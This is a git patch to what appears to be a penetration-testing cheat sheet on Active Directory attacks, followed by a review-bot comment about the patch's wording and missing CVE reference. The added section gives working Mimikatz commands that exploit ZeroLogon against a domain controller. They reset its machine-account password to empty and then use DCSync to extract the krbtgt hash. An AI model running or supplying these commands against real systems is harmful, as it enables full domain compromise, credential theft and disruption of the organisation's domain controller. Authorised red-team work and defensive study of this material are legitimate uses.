From 14586e4d7a3f9f6c82447dd24880da0ea29afbc8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 16 Sep 2020 14:13:40 +0200 Subject: [PATCH] ZeroLogon via Mimikatz --- Methodology and Resources/Active Directory Attack.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 26d4276..c47a51b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -292,6 +292,17 @@ $ secretsdump.py 'domain/DC01$@DC01.domain.local' -hashes aad3b435b51404eeaad3b4 Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000::: ``` +with Mimikatz : 2.2.0 20200916 ZeroLogon & DCSync + +```powershell +privilege::debug +# check for the CVE +lsadump::zerologon /target:DC01.corp.local /account:DC01$ +# exploit the CVE and set the computer account's password to "" +lsadump::zerologon /target:DC01.corp.local /account:DC01$ /exploit +# dcsync to extract some hashes +lsadump::dcsync /domain:CORP.LOCAL /dc:dc01.corp.local /user:krbtgt /authuser:DC01$ /authdomain:CORP /authpassword:"" /authntlm +``` ### Open Shares
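Review bot: the added block's comment "check for the CVE" never says which CVE is meant; the introductory line should name the vulnerability identifier (or link the advisory) next to "ZeroLogon" so a reader of the section can map the check to the actual patch level, instead of leaving "the CVE" implicit. Two smaller points in the same hunk: the lead line `with Mimikatz : 2.2.0 20200916 ZeroLogon & DCSync` has a stray space before the colon and reads as a bare version string, so something like "with Mimikatz (2.2.0 build 20200916 or later)" would be clearer; and the example switches to `corp.local` / `CORP` while the surrounding section (the `secretsdump.py` line just above) uses `domain/DC01.domain.local`, so the domain name should be kept consistent with the rest of the section to avoid confusing copy-paste readers. Finally, the comment states the step sets the computer account's password to `""`, but the section gives no corresponding note that this change persists on the DC; the documentation should at least call that side effect out explicitly rather than leaving it as a code comment.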